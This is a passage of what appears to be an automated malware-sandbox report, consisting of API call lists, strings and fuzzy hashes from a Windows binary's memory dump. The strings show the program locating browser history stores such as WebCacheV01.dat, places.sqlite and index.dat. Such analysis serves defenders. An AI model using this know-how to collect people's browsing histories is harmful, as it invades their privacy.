                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                    • API String ID: 2887208581-2114579845
                                                                                                                                                                                    • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02240048), ref: 0044DF01
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02250050), ref: 0044DF11
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00C26DA8), ref: 0044DF21
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02250458), ref: 0044DF31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                                                    • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                    • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@DeleteObject
                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                    • API String ID: 1103273653-628097481
                                                                                                                                                                                    • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                                                                                    • String ID: $$8
                                                                                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
• Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
• Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
• Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
• Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2641622041-467022611
• Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
• Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
• Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
• Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
• Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
• Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
• Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
• Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
• Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
• Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
• Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
• Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• GetLastError.KERNEL32 ref: 004175A2
• GetLastError.KERNEL32 ref: 004175A8
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
• Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
• Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
• Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
• Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandleSleep
                                                                                                                                                                                    • String ID: }A
                                                                                                                                                                                    • API String ID: 252777609-2138825249
                                                                                                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                    • free.MSVCRT ref: 00409A31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                    • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                    • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: BINARY
                                                                                                                                                                                    • API String ID: 2221118986-907554435
                                                                                                                                                                                    • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                    • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
